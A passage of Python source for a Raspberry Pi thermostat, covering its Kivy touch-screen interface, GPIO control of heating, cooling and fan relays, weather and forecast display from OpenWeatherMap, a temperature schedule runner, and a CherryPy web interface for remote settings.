"Hold": ( 0.0, 1.0, 0.0, 0.4 ),
}
def setControlState( control, state ):
with thermostatLock:
control.state = state
if state == "normal":
control.background_color = controlColours[ "normal" ]
else:
control.background_color = controlColours[ control.text.replace( "[b]", "" ).replace( "[/b]", "" ) ]
controlLabel = control.text.replace( "[b]", "" ).replace( "[/b]", "" ).lower()
log( LOG_LEVEL_STATE, controlLabel + CHILD_DEVICE_SUFFIX_UICONTROL, MSG_SUBTYPE_BINARY_STATUS, "0" if state == "normal" else "1" )
coolControl = ToggleButton( text="[b]Cool[/b]",
markup=True,
size_hint = ( None, None )
)
setControlState( coolControl, "normal" if not( state.exists( "state" ) ) else state.get( "state" )[ "coolControl" ] )
heatControl = ToggleButton( text="[b]Heat[/b]",
markup=True,
size_hint = ( None, None )
)
setControlState( heatControl, "normal" if not( state.exists( "state" ) ) else state.get( "state" )[ "heatControl" ] )
fanControl = ToggleButton( text="[b]Fan[/b]",
markup=True,
size_hint = ( None, None )
)
setControlState( fanControl, "normal" if not( state.exists( "state" ) ) else state.get( "state" )[ "fanControl" ] )
holdControl = ToggleButton( text="[b]Hold[/b]",
markup=True,
size_hint = ( None, None )
)
setControlState( holdControl, "normal" if not( state.exists( "state" ) ) else state.get( "state" )[ "holdControl" ] )
def get_status_string():
with thermostatLock:
sched = "None"
if holdControl.state == "down":
sched = "Hold"
elif useTestSchedule:
sched = "Test"
elif heatControl.state == "down":
sched = "Heat"
elif coolControl.state == "down":
sched = "Cool"
return "[b]System:[/b]\n " + \
"Heat: " + ( "[color=00ff00][b]On[/b][/color]" if GPIO.input( heatPin ) else "Off" ) + "\n " + \
"Cool: " + ( "[color=00ff00][b]On[/b][/color]" if GPIO.input( coolPin ) else "Off" ) + "\n " + \
"Fan: " + ( "[color=00ff00][b]On[/b][/color]" if GPIO.input( fanPin ) else "Auto" ) + "\n " + \
"Sched: " + sched
versionLabel = Label( text="Thermostat v" + str( THERMOSTAT_VERSION ), size_hint = ( None, None ), font_size='10sp', markup=True, text_size=( 150, 20 ) )
currentLabel = Label( text="[b]" + str( currentTemp ) + scaleUnits + "[/b]", size_hint = ( None, None ), font_size='100sp', markup=True, text_size=( 300, 200 ) )
altCurLabel = Label( text=currentLabel.text, size_hint = ( None, None ), font_size='100sp', markup=True, text_size=( 300, 200 ), color=( 0.4, 0.4, 0.4, 0.2 ) )
setLabel = Label( text=" Set\n[b]" + str( setTemp ) + scaleUnits + "[/b]", size_hint = ( None, None ), font_size='25sp', markup=True, text_size=( 100, 100 ) )
statusLabel = Label( text=get_status_string(), size_hint = ( None, None ), font_size='20sp', markup=True, text_size=( 140, 130 ) )
dateLabel = Label( text="[b]" + time.strftime("%a %b %d, %Y") + "[/b]", size_hint = ( None, None ), font_size='20sp', markup=True, text_size=( 270, 40 ) )
timeStr = time.strftime("%I:%M %p").lower()
timeLabel = Label( text="[b]" + ( timeStr if timeStr[0:1] != "0" else timeStr[1:] ) + "[/b]", size_hint = ( None, None ), font_size='40sp', markup=True, text_size=( 180, 75 ) )
altTimeLabel = Label( text=timeLabel.text, size_hint = ( None, None ), font_size='40sp', markup=True, text_size=( 180, 75 ), color=( 0.4, 0.4, 0.4, 0.2 ) )
tempSlider = Slider( orientation='vertical', min=minTemp, max=maxTemp, step=tempStep, value=setTemp, size_hint = ( None, None ) )
screenMgr = None
##############################################################################
# #
# Weather functions/constants/widgets #
# #
##############################################################################
weatherLocation = settings.get( "weather" )[ "location" ]
weatherAppKey = settings.get( "weather" )[ "appkey" ]
weatherURLBase = "http://api.openweathermap.org/data/2.5/"
weatherURLCurrent = weatherURLBase + "weather?units=" + tempScale + "&q=" + weatherLocation + "&APPID=" + weatherAppKey
weatherURLForecast = weatherURLBase + "forecast/daily?units=" + tempScale + "&q=" + weatherLocation + "&APPID=" + weatherAppKey
weatherURLTimeout = settings.get( "weather" )[ "URLtimeout" ]
weatherRefreshInterval = settings.get( "weather" )[ "weatherRefreshInterval" ] * 60
forecastRefreshInterval = settings.get( "weather" )[ "forecastRefreshInterval" ] * 60
weatherExceptionInterval = settings.get( "weather" )[ "weatherExceptionInterval" ] * 60
weatherSummaryLabel = Label( text="", size_hint = ( None, None ), font_size='20sp', markup=True, text_size=( 200, 20 ) )
weatherDetailsLabel = Label( text="", size_hint = ( None, None ), font_size='20sp', markup=True, text_size=( 300, 150 ), valign="top" )
weatherImg = Image( source="web/images/na.png", size_hint = ( None, None ) )
forecastTodaySummaryLabel = Label( text="", size_hint = ( None, None ), font_size='15sp', markup=True, text_size=( 100, 15 ) )
forecastTodayDetailsLabel = Label( text="", size_hint = ( None, None ), font_size='15sp', markup=True, text_size=( 200, 150 ), valign="top" )
forecastTodayImg = Image( source="web/images/na.png", size_hint = ( None, None ) )
forecastTomoSummaryLabel = Label( text="", size_hint = ( None, None ), font_size='15sp', markup=True, text_size=( 100, 15 ))
forecastTomoDetailsLabel = Label( text="", size_hint = ( None, None ), font_size='15sp', markup=True, text_size=( 200, 150 ), valign="top" )
forecastTomoImg = Image( source="web/images/na.png", size_hint = ( None, None ) )
def get_weather( url ):
return json.loads( urllib2.urlopen( url, None, weatherURLTimeout ).read() )
def get_cardinal_direction( heading ):
directions = [ "N", "NE", "E", "SE", "S", "SW", "W", "NW", "N" ]
return directions[ int( round( ( ( heading % 360 ) / 45 ) ) ) ]
def display_current_weather( dt ):
with weatherLock:
interval = weatherRefreshInterval
try:
weather = get_weather( weatherURLCurrent )
weatherImg.source = "web/images/" + weather[ "weather" ][ 0 ][ "icon" ] + ".png"
weatherSummaryLabel.text = "[b]" + weather[ "weather" ][ 0 ][ "description" ].title() + "[/b]"
weatherDetailsLabel.text = "\n".join( (
"Temp: " + str( int( round( weather[ "main" ][ "temp" ], 0 ) ) ) + scaleUnits,
"Humidity: " + str( weather[ "main" ][ "humidity" ] ) + "%",
"Wind: " + str( int( round( weather[ "wind" ][ "speed" ] * windFactor ) ) ) + windUnits + " " + get_cardinal_direction( weather[ "wind" ][ "deg" ] ),
"Clouds: " + str( weather[ "clouds" ][ "all" ] ) + "%",
"Sun: " + time.strftime("%H:%M", time.localtime( weather[ "sys" ][ "sunrise" ] ) ) + " am, " + time.strftime("%I:%M", time.localtime( weather[ "sys" ][ "sunset" ] ) ) + " pm"
) )
log( LOG_LEVEL_INFO, CHILD_DEVICE_WEATHER_CURR, MSG_SUBTYPE_TEXT, weather[ "weather" ][ 0 ][ "description" ].title() + "; " + re.sub( '\n', "; ", re.sub( ' +', ' ', weatherDetailsLabel.text ).strip() ) )
except:
interval = weatherExceptionInterval
weatherImg.source = "web/images/na.png"
weatherSummaryLabel.text = ""
weatherDetailsLabel.text = ""
log( LOG_LEVEL_ERROR, CHILD_DEVICE_WEATHER_CURR, MSG_SUBTYPE_TEXT, "Update FAILED!" )
Clock.schedule_once( display_current_weather, interval )
def get_precip_amount( raw ):
precip = round( raw * precipFactor, precipRound )
if tempScale == "metric":
return str( int ( precip ) )
else:
return str( precip )
def display_forecast_weather( dt ):
with weatherLock:
interval = forecastRefreshInterval
try:
forecast = get_weather( weatherURLForecast )
today = forecast[ "list" ][ 0 ]
tomo = forecast[ "list" ][ 1 ]
forecastTodayImg.source = "web/images/" + today[ "weather" ][ 0 ][ "icon" ] + ".png"
forecastTodaySummaryLabel.text = "[b]" + today[ "weather" ][ 0 ][ "description" ].title() + "[/b]"
todayText = "\n".join( (
"High: " + str( int( round( today[ "temp" ][ "max" ], 0 ) ) ) + scaleUnits + ", Low: " + str( int( round( today[ "temp" ][ "min" ], 0 ) ) ) + scaleUnits,
"Humidity: " + str( today[ "humidity" ] ) + "%",
"Wind: " + str( int( round( today[ "speed" ] * windFactor ) ) ) + windUnits + " " + get_cardinal_direction( today[ "deg" ] ),
"Clouds: " + str( today[ "clouds" ] ) + "%",
) )
if "rain" in today or "snow" in today:
todayText += "\n"
if "rain" in today:
todayText += "Rain: " + get_precip_amount( today[ "rain" ] ) + precipUnits
if "snow" in today:
todayText += ", Snow: " + get_precip_amount( today[ "snow" ] ) + precipUnits
else:
todayText += "Snow: " + get_precip_amount( today[ "snow" ] ) + precipUnits
forecastTodayDetailsLabel.text = todayText;
forecastTomoImg.source = "web/images/" + tomo[ "weather" ][ 0 ][ "icon" ] + ".png"
forecastTomoSummaryLabel.text = "[b]" + tomo[ "weather" ][ 0 ][ "description" ].title() + "[/b]"
tomoText = "\n".join( (
"High: " + str( int( round( tomo[ "temp" ][ "max" ], 0 ) ) ) + scaleUnits + ", Low: " + str( int( round( tomo[ "temp" ][ "min" ], 0 ) ) ) + scaleUnits,
"Humidity: " + str( tomo[ "humidity" ] ) + "%",
"Wind: " + str( int( round( tomo[ "speed" ] * windFactor ) ) ) + windUnits + " " + get_cardinal_direction( tomo[ "deg" ] ),
"Clouds: " + str( tomo[ "clouds" ] ) + "%",
) )
if "rain" in tomo or "snow" in tomo:
tomoText += "\n"
if "rain" in tomo:
tomoText += "Rain: " + get_precip_amount( tomo[ "rain" ] ) + precipUnits
if "snow" in tomo:
tomoText += ", Snow: " + get_precip_amount( tomo[ "snow" ] ) + precipUnits
else:
tomoText += "Snow: " + get_precip_amount( tomo[ "snow" ] ) + precipUnits
forecastTomoDetailsLabel.text = tomoText
log( LOG_LEVEL_INFO, CHILD_DEVICE_WEATHER_FCAST_TODAY, MSG_SUBTYPE_TEXT, today[ "weather" ][ 0 ][ "description" ].title() + "; " + re.sub( '\n', "; ", re.sub( ' +', ' ', forecastTodayDetailsLabel.text ).strip() ) )
log( LOG_LEVEL_INFO, CHILD_DEVICE_WEATHER_FCAST_TOMO, MSG_SUBTYPE_TEXT, tomo[ "weather" ][ 0 ][ "description" ].title() + "; " + re.sub( '\n', "; ", re.sub( ' +', ' ', forecastTomoDetailsLabel.text ).strip() ) )
except:
interval = weatherExceptionInterval
forecastTodayImg.source = "web/images/na.png"
forecastTodaySummaryLabel.text = ""
forecastTodayDetailsLabel.text = ""
forecastTomoImg.source = "web/images/na.png"
forecastTomoSummaryLabel.text = ""
forecastTomoDetailsLabel.text = ""
log( LOG_LEVEL_ERROR, CHILD_DEVICE_WEATHER_FCAST_TODAY, MSG_SUBTYPE_TEXT, "Update FAILED!" )
Clock.schedule_once( display_forecast_weather, interval )
##############################################################################
# #
# Utility Functions #
# #
##############################################################################
def get_ip_address():
s = socket.socket( socket.AF_INET, socket.SOCK_DGRAM )
s.settimeout( 10 ) # 10 seconds
try:
s.connect( ( "8.8.8.8", 80 ) ) # Google DNS server
ip = s.getsockname()[0]
log( LOG_LEVEL_INFO, CHILD_DEVICE_NODE, MSG_SUBTYPE_CUSTOM +"/settings/ip", ip, timestamp=False )
except socket.error:
ip = "127.0.0.1"
log( LOG_LEVEL_ERROR, CHILD_DEVICE_NODE, MSG_SUBTYPE_CUSTOM + "/settings/ip", "FAILED to get ip address, returning " + ip, timestamp=False )
return ip
def getVersion():
log( LOG_LEVEL_STATE, CHILD_DEVICE_NODE, MSG_SUBTYPE_VERSION, THERMOSTAT_VERSION )
def restart():
log( LOG_LEVEL_STATE, CHILD_DEVICE_NODE, MSG_SUBTYPE_CUSTOM + "/restart", "Thermostat restarting...", single=True )
GPIO.cleanup()
if logFile is not None:
logFile.flush()
os.fsync( logFile.fileno() )
logFile.close()
if mqttEnabled:
mqttc.disconnect()
os.execl( sys.executable, 'python', __file__, *sys.argv[1:] ) # This does not return!!!
def setLogLevel( msg ):
global logLevel
if LOG_LEVELS.get( msg.payload ):
log( LOG_LEVEL_STATE, CHILD_DEVICE_NODE, MSG_SUBTYPE_CUSTOM + "/loglevel", "LogLevel set to: " + msg.payload )
logLevel = LOG_LEVELS.get( msg.payload, logLevel )
else:
log( LOG_LEVEL_ERROR, CHILD_DEVICE_NODE, MSG_SUBTYPE_CUSTOM + "/loglevel", "Invalid LogLevel: " + msg.payload )
##############################################################################
# #
# Thermostat Implementation #
# #
##############################################################################
# Main furnace/AC system control function:
def change_system_settings():
with thermostatLock:
hpin_start = str( GPIO.input( heatPin ) )
cpin_start = str( GPIO.input( coolPin ) )
fpin_start = str( GPIO.input( fanPin ) )
if heatControl.state == "down":
GPIO.output( coolPin, GPIO.LOW )
if setTemp >= currentTemp + tempHysteresis:
GPIO.output( heatPin, GPIO.HIGH )
GPIO.output( fanPin, GPIO.HIGH )
elif setTemp <= currentTemp:
GPIO.output( heatPin, GPIO.LOW )
if fanControl.state != "down" and not GPIO.input( coolPin ):
GPIO.output( fanPin, GPIO.LOW )
else:
GPIO.output( heatPin, GPIO.LOW )
if coolControl.state == "down":
if setTemp <= currentTemp - tempHysteresis:
GPIO.output( coolPin, GPIO.HIGH )
GPIO.output( fanPin, GPIO.HIGH )
elif setTemp >= currentTemp:
GPIO.output( coolPin, GPIO.LOW )
if fanControl.state != "down" and not GPIO.input( heatPin ):
GPIO.output( fanPin, GPIO.LOW )
else:
GPIO.output( coolPin, GPIO.LOW )
if fanControl.state != "down" and not GPIO.input( heatPin ):
GPIO.output( fanPin, GPIO.LOW )
if fanControl.state == "down":
GPIO.output( fanPin, GPIO.HIGH )
else:
if not GPIO.input( heatPin ) and not GPIO.input( coolPin ):
GPIO.output( fanPin, GPIO.LOW )
# save the thermostat state in case of restart
state.put( "state", setTemp=setTemp,
heatControl=heatControl.state, coolControl=coolControl.state, fanControl=fanControl.state, holdControl=holdControl.state
)
statusLabel.text = get_status_string()
if hpin_start != str( GPIO.input( heatPin ) ):
log( LOG_LEVEL_STATE, CHILD_DEVICE_HEAT, MSG_SUBTYPE_BINARY_STATUS, "1" if GPIO.input( heatPin ) else "0" )
if cpin_start != str( GPIO.input( coolPin ) ):
log( LOG_LEVEL_STATE, CHILD_DEVICE_COOL, MSG_SUBTYPE_BINARY_STATUS, "1" if GPIO.input( coolPin ) else "0" )
if fpin_start != str( GPIO.input( fanPin ) ):
log( LOG_LEVEL_STATE, CHILD_DEVICE_FAN, MSG_SUBTYPE_BINARY_STATUS, "1" if GPIO.input( fanPin ) else "0" )
# This callback will be bound to the touch screen UI buttons:
def control_callback( control ):
with thermostatLock:
setControlState( control, control.state ) # make sure we change the background colour!
if control is coolControl:
if control.state == "down":
setControlState( heatControl, "normal" )
reloadSchedule()
if control is heatControl:
if control.state == "down":
setControlState( coolControl, "normal" )
reloadSchedule()
# Check the current sensor temperature
def check_sensor_temp( dt ):
with thermostatLock:
global currentTemp, priorCorrected
global tempSensor
if tempSensor is not None:
bus = smbus.SMBus(1)
time.sleep(0.3)
bus.write_byte(0x40, 0xF3)
time.sleep(0.3)
data0 = bus.read_byte(0x40)
data1 = bus.read_byte(0x40)
# rawTemp = tempSensor.get_temperature( sensorUnits )
rawTemp = ((data0 * 256 + data1) * 175.72 / 65536.0) - 46.85
correctedTemp = ( ( ( rawTemp - freezingMeasured ) * referenceRange ) / measuredRange ) + freezingPoint
currentTemp = round( correctedTemp, 1 )
log( LOG_LEVEL_DEBUG, CHILD_DEVICE_TEMP, MSG_SUBTYPE_CUSTOM + "/raw", str( rawTemp ) )
log( LOG_LEVEL_DEBUG, CHILD_DEVICE_TEMP, MSG_SUBTYPE_CUSTOM + "/corrected", str( correctedTemp ) )
if abs( priorCorrected - correctedTemp ) >= TEMP_TOLERANCE:
log( LOG_LEVEL_STATE, CHILD_DEVICE_TEMP, MSG_SUBTYPE_TEMPERATURE, str( currentTemp ) )
priorCorrected = correctedTemp
currentLabel.text = "[b]" + str( currentTemp ) + scaleUnits + "[/b]"
altCurLabel.text = currentLabel.text
dateLabel.text = "[b]" + time.strftime("%a %b %d, %Y") + "[/b]"
timeStr = time.strftime("%I:%M %p").lower()
timeLabel.text = ( "[b]" + ( timeStr if timeStr[0:1] != "0" else timeStr[1:] ) + "[/b]" ).lower()
altTimeLabel.text = timeLabel.text
change_system_settings()
# This is called when the desired temp slider is updated:
def update_set_temp( slider, value ):
with thermostatLock:
global setTemp
priorTemp = setTemp
setTemp = round( slider.value, 1 )
setLabel.text = " Set\n[b]" + str( setTemp ) + scaleUnits + "[/b]"
if priorTemp != setTemp:
log( LOG_LEVEL_STATE, CHILD_DEVICE_UICONTROL_SLIDER, MSG_SUBTYPE_TEMPERATURE, str( setTemp ) )
# Check the PIR motion sensor status
def check_pir( pin ):
global minUITimer
with thermostatLock:
if GPIO.input( pirPin ):
log( LOG_LEVEL_INFO, CHILD_DEVICE_PIR, MSG_SUBTYPE_TRIPPED, "1" )
if minUITimer != None:
Clock.unschedule( show_minimal_ui )
minUITimer = Clock.schedule_once( show_minimal_ui, minUITimeout )
ignore = False
now = datetime.datetime.now().time()
if pirIgnoreFrom > pirIgnoreTo:
if now >= pirIgnoreFrom or now < pirIgnoreTo:
ignore = True
else:
if now >= pirIgnoreFrom and now < pirIgnoreTo:
ignore = True
if screenMgr.current == "minimalUI" and not( ignore ):
screenMgr.current = "thermostatUI"
log( LOG_LEVEL_DEBUG, CHILD_DEVICE_SCREEN, MSG_SUBTYPE_TEXT, "Full" )
else:
log( LOG_LEVEL_DEBUG, CHILD_DEVICE_PIR, MSG_SUBTYPE_TRIPPED, "0" )
# Minimal UI Display functions and classes
def show_minimal_ui( dt ):
with thermostatLock:
screenMgr.current = "minimalUI"
log( LOG_LEVEL_DEBUG, CHILD_DEVICE_SCREEN, MSG_SUBTYPE_TEXT, "Minimal" )
class MinimalScreen( Screen ):
def on_touch_down( self, touch ):
if self.collide_point( *touch.pos ):
touch.grab( self )
return True
def on_touch_up( self, touch ):
global minUITimer
if touch.grab_current is self:
touch.ungrab( self )
with thermostatLock:
if minUITimer != None:
Clock.unschedule( show_minimal_ui )
minUITimer = Clock.schedule_once( show_minimal_ui, minUITimeout )
self.manager.current = "thermostatUI"
log( LOG_LEVEL_DEBUG, CHILD_DEVICE_SCREEN, MSG_SUBTYPE_TEXT, "Full" )
return True
##############################################################################
# #
# Kivy Thermostat App class #
# #
##############################################################################
class ThermostatApp( App ):
def build( self ):
global screenMgr
# Set up the thermostat UI layout:
thermostatUI = FloatLayout( size=( 800, 480 ) )
# Make the background black:
with thermostatUI.canvas.before:
Color( 0.0, 0.0, 0.0, 1 )
self.rect = Rectangle( size=( 800, 480 ), pos=thermostatUI.pos )
# Create the rest of the UI objects ( and bind them to callbacks, if necessary ):
wimg = Image( source='web/images/logo.png' )
coolControl.bind( on_press=control_callback )
heatControl.bind( on_press=control_callback )
fanControl.bind( on_press=control_callback )
holdControl.bind( on_press=control_callback )
tempSlider.bind( on_touch_down=update_set_temp, on_touch_move=update_set_temp )
# set sizing and position info
wimg.size = ( 80, 80 )
wimg.size_hint = ( None, None )
wimg.pos = ( 10, 380 )
heatControl.size = ( 80, 80 )
heatControl.pos = ( 680, 380 )
coolControl.size = ( 80, 80 )
coolControl.pos = ( 680, 270 )
fanControl.size = ( 80, 80 )
fanControl.pos = ( 680, 160 )
statusLabel.pos = ( 670, 40 )
tempSlider.size = ( 100, 360 )
tempSlider.pos = ( 570, 20 )
holdControl.size = ( 80, 80 )
holdControl.pos = ( 480, 380 )
setLabel.pos = ( 590, 390 )
currentLabel.pos = ( 390, 290 )
dateLabel.pos = ( 180, 370 )
timeLabel.pos = ( 335, 380 )
weatherImg.pos = ( 265, 160 )
weatherSummaryLabel.pos = ( 430, 160 )
weatherDetailsLabel.pos = ( 395, 60 )
versionLabel.pos = ( 320, 0 )
forecastTodayHeading = Label( text="[b]Today[/b]:", font_size='20sp', markup=True, size_hint = ( None, None ), pos = ( 0, 290 ) )
forecastTodayImg.pos = ( 0, 260 )
forecastTodaySummaryLabel.pos = ( 100, 260 )
forecastTodayDetailsLabel.pos = ( 80, 167 )
forecastTomoHeading = Label( text="[b]Tomorrow[/b]:", font_size='20sp', markup=True, size_hint = ( None, None ), pos = ( 20, 130 ) )
forecastTomoImg.pos = ( 0, 100 )
forecastTomoSummaryLabel.pos = ( 100, 100 )
forecastTomoDetailsLabel.pos = ( 80, 7 )
# Add the UI elements to the thermostat UI layout:
thermostatUI.add_widget( wimg )
thermostatUI.add_widget( coolControl )
thermostatUI.add_widget( heatControl )
thermostatUI.add_widget( fanControl )
thermostatUI.add_widget( holdControl )
thermostatUI.add_widget( tempSlider )
thermostatUI.add_widget( currentLabel )
thermostatUI.add_widget( setLabel )
thermostatUI.add_widget( statusLabel )
thermostatUI.add_widget( dateLabel )
thermostatUI.add_widget( timeLabel )
thermostatUI.add_widget( weatherImg )
thermostatUI.add_widget( weatherSummaryLabel )
thermostatUI.add_widget( weatherDetailsLabel )
thermostatUI.add_widget( versionLabel )
thermostatUI.add_widget( forecastTodayHeading )
thermostatUI.add_widget( forecastTodayImg )
thermostatUI.add_widget( forecastTodaySummaryLabel )
thermostatUI.add_widget( forecastTodayDetailsLabel )
thermostatUI.add_widget( forecastTomoHeading )
thermostatUI.add_widget( forecastTomoImg )
thermostatUI.add_widget( forecastTomoDetailsLabel )
thermostatUI.add_widget( forecastTomoSummaryLabel )
layout = thermostatUI
# Minimap UI initialization
if minUIEnabled:
uiScreen = Screen( name="thermostatUI" )
uiScreen.add_widget( thermostatUI )
minScreen = MinimalScreen( name="minimalUI" )
minUI = FloatLayout( size=( 800, 480 ) )
with minUI.canvas.before:
Color( 0.0, 0.0, 0.0, 1 )
self.rect = Rectangle( size=( 800, 480 ), pos=minUI.pos )
altCurLabel.pos = ( 390, 290 )
altTimeLabel.pos = ( 335, 380 )
minUI.add_widget( altCurLabel )
minUI.add_widget( altTimeLabel )
minScreen.add_widget( minUI )
screenMgr = ScreenManager( transition=NoTransition() ) # FadeTransition seems to have OpenGL bugs in Kivy Dev 1.9.1 and is unstable, so sticking with no transition for now
screenMgr.add_widget ( uiScreen )
screenMgr.add_widget ( minScreen )
layout = screenMgr
minUITimer = Clock.schedule_once( show_minimal_ui, minUITimeout )
if pirEnabled:
Clock.schedule_interval( check_pir, pirCheckInterval )
# Start checking the temperature
Clock.schedule_interval( check_sensor_temp, tempCheckInterval )
# Show the current weather & forecast
Clock.schedule_once( display_current_weather, 5 )
Clock.schedule_once( display_forecast_weather, 10 )
return layout
##############################################################################
# #
# Scheduler Implementation #
# #
##############################################################################
def startScheduler():
log( LOG_LEVEL_INFO, CHILD_DEVICE_SCHEDULER, MSG_SUBTYPE_TEXT, "Started" )
while True:
if holdControl.state == "normal":
with scheduleLock:
log( LOG_LEVEL_DEBUG, CHILD_DEVICE_SCHEDULER, MSG_SUBTYPE_TEXT, "Running pending" )
schedule.run_pending()
time.sleep( 10 )
def setScheduledTemp( temp ):
with thermostatLock:
global setTemp
if holdControl.state == "normal":
setTemp = round( temp, 1 )
setLabel.text = " Set\n[b]" + str( setTemp ) + scaleUnits + "[/b]"
tempSlider.value = setTemp
log( LOG_LEVEL_STATE, CHILD_DEVICE_SCHEDULER, MSG_SUBTYPE_TEMPERATURE, str( setTemp ) )
def getTestSchedule():
days = [ "monday", "tuesday", "wednesday", "thursday", "friday", "saturday", "sunday" ]
testSched = {}
for i in range( len( days ) ):
tempList = []
for minute in range( 60 * 24 ):
hrs, mins = divmod( minute, 60 )
tempList.append( [
str( hrs ).rjust( 2, '0' ) + ":" + str( mins ).rjust( 2, '0' ),
float( i + 1 ) / 10.0 + ( ( 19.0 if tempScale == "metric" else 68.0 ) if minute % 2 == 1 else ( 22.0 if tempScale == "metric" else 72.0 ) )
] )
testSched[ days[i] ] = tempList
return testSched
def reloadSchedule():
with scheduleLock:
schedule.clear()
activeSched = None
with thermostatLock:
thermoSched = JsonStore( "thermostat_schedule.json" )
if holdControl.state != "down":
if heatControl.state == "down":
activeSched = thermoSched[ "heat" ]
log( LOG_LEVEL_INFO, CHILD_DEVICE_SCHEDULER, MSG_SUBTYPE_CUSTOM + "/load", "heat" )
elif coolControl.state == "down":
activeSched = thermoSched[ "cool" ]
log( LOG_LEVEL_INFO, CHILD_DEVICE_SCHEDULER, MSG_SUBTYPE_CUSTOM + "/load", "cool" )
if useTestSchedule:
activeSched = getTestSchedule()
log( LOG_LEVEL_INFO, CHILD_DEVICE_SCHEDULER, MSG_SUBTYPE_CUSTOM + "/load", "test" )
print "Using Test Schedule!!!"
if activeSched != None:
for day, entries in activeSched.iteritems():
for i, entry in enumerate( entries ):
getattr( schedule.every(), day ).at( entry[ 0 ] ).do( setScheduledTemp, entry[ 1 ] )
log( LOG_LEVEL_DEBUG, CHILD_DEVICE_SCHEDULER, MSG_SUBTYPE_TEXT, "Set " + day + ", at: " + entry[ 0 ] + " = " + str( entry[ 1 ] ) + scaleUnits )
##############################################################################
# #
# Web Server Interface #
# #
##############################################################################
class WebInterface( object ):
@cherrypy.expose
def index( self ):
log( LOG_LEVEL_INFO, CHILD_DEVICE_WEBSERVER, MSG_SUBTYPE_TEXT, "Served thermostat.html to: " + cherrypy.request.remote.ip )
file = open( "web/html/thermostat.html", "r" )
html = file.read()
file.close()
with thermostatLock:
html = html.replace( "@@version@@", str( THERMOSTAT_VERSION ) )
html = html.replace( "@@temp@@", str( setTemp ) )
html = html.replace( "@@current@@", str( currentTemp ) + scaleUnits )
html = html.replace( "@@minTemp@@", str( minTemp ) )
html = html.replace( "@@maxTemp@@", str( maxTemp ) )
html = html.replace( "@@tempStep@@", str( tempStep ) )
status = statusLabel.text.replace( "[b]", "<b>" ).replace( "[/b]", "</b>" ).replace( "\n", "<br>" ).replace( " ", " " )
status = status.replace( "[color=00ff00]", '<font color="red">' ).replace( "[/color]", '</font>' )
html = html.replace( "@@status@@", status )
html = html.replace( "@@dt@@", dateLabel.text.replace( "[b]", "<b>" ).replace( "[/b]", "</b>" ) + ", " + timeLabel.text.replace( "[b]", "<b>" ).replace( "[/b]", "</b>" ) )
html = html.replace( "@@heatChecked@@", "checked" if heatControl.state == "down" else "" )
html = html.replace( "@@coolChecked@@", "checked" if coolControl.state == "down" else "" )
html = html.replace( "@@fanChecked@@", "checked" if fanControl.state == "down" else "" )
html = html.replace( "@@holdChecked@@", "checked" if holdControl.state == "down" else "" )
return html
@cherrypy.expose
def set( self, temp, heat="off", cool="off", fan="off", hold="off" ):
global setTemp
global setLabel
global heatControl
global coolControl
global fanControl
log( LOG_LEVEL_INFO, CHILD_DEVICE_WEBSERVER, MSG_SUBTYPE_TEXT, "Set thermostat received from: " + cherrypy.request.remote.ip )
tempChanged = setTemp != float( temp )
with thermostatLock:
setTemp = float( temp )
setLabel.text = " Set\n[b]" + str( setTemp ) + "c[/b]"
tempSlider.value = setTemp
if tempChanged:
log( LOG_LEVEL_STATE, CHILD_DEVICE_WEBSERVER, MSG_SUBTYPE_TEMPERATURE, str( setTemp ) )
if heat == "on":
setControlState( heatControl, "down" )
else:
setControlState( heatControl, "normal" )
if cool == "on":
setControlState( coolControl, "down" )
else:
setControlState( coolControl, "normal" )
if fan == "on":
setControlState( fanControl, "down" )
else:
setControlState( fanControl, "normal" )
if hold == "on":
setControlState( holdControl, "down" )
else:
setControlState( holdControl, "normal" )
reloadSchedule()
file = open( "web/html/thermostat_set.html", "r" )
html = file.read()
file.close()
with thermostatLock:
html = html.replace( "@@version@@", str( THERMOSTAT_VERSION ) )
html = html.replace( "@@dt@@", dateLabel.text.replace( "[b]", "<b>" ).replace( "[/b]", "</b>" ) + ", " + timeLabel.text.replace( "[b]", "<b>" ).replace( "[/b]", "</b>" ) )
html = html.replace( "@@temp@@", ( '<font color="red"><b>' if tempChanged else "" ) + str( setTemp ) + ( '</b></font>' if tempChanged else "" ) )
html = html.replace( "@@heat@@", ( '<font color="red"><b>' if heat == "on" else "" ) + heat + ( '</b></font>' if heat == "on" else "" ) )
html = html.replace( "@@cool@@", ( '<font color="red"><b>' if cool == "on" else "" ) + cool + ( '</b></font>' if cool == "on" else "" ) )
html = html.replace( "@@fan@@", ( '<font color="red"><b>' if fan == "on" else "" ) + fan + ( '</b></font>' if fan == "on" else "" ) )
html = html.replace( "@@hold@@", ( '<font color="red"><b>' if hold == "on" else "" ) + hold + ( '</b></font>' if hold == "on" else "" ) )
return html
@cherrypy.expose
def schedule( self ):
log( LOG_LEVEL_INFO, CHILD_DEVICE_WEBSERVER, MSG_SUBTYPE_TEXT, "Served thermostat_schedule.html to: " + cherrypy.request.remote.ip )
file = open( "web/html/thermostat_schedule.html", "r" )
html = file.read()
file.close()
with thermostatLock:
html = html.replace( "@@version@@", str( THERMOSTAT_VERSION ) )
html = html.replace( "@@minTemp@@", str( minTemp ) )
html = html.replace( "@@maxTemp@@", str( maxTemp ) )
html = html.replace( "@@tempStep@@", str( tempStep ) )
html = html.replace( "@@dt@@", dateLabel.text.replace( "[b]", "<b>" ).replace( "[/b]", "</b>" ) + ", " + timeLabel.text.replace( "[b]", "<b>" ).replace( "[/b]", "</b>" ) )
return html
@cherrypy.expose
@cherrypy.tools.json_in()
def save( self ):
log( LOG_LEVEL_STATE, CHILD_DEVICE_WEBSERVER, MSG_SUBTYPE_TEXT, "Set schedule received from: " + cherrypy.request.remote.ip )
schedule = cherrypy.request.json
with scheduleLock:
file = open( "thermostat_schedule.json", "w" )
file.write( json.dumps( schedule, indent = 4 ) )
file.close()
reloadSchedule()
file = open( "web/html/thermostat_saved.html", "r" )
html = file.read()
file.close()
with thermostatLock:
html = html.replace( "@@version@@", str( THERMOSTAT_VERSION ) )
html = html.replace( "@@dt@@", dateLabel.text.replace( "[b]", "<b>" ).replace( "[/b]", "</b>" ) + ", " + timeLabel.text.replace( "[b]", "<b>" ).replace( "[/b]", "</b>" ) )
return html
def startWebServer():
host = "discover" if not( settings.exists( "web" ) ) else settings.get( "web" )[ "host" ]
cherrypy.server.socket_host = host if host != "discover" else get_ip_address() # use machine IP address if host = "discover"
cherrypy.server.socket_port = 80 if not( settings.exists( "web" ) ) else settings.get( "web" )[ "port" ]
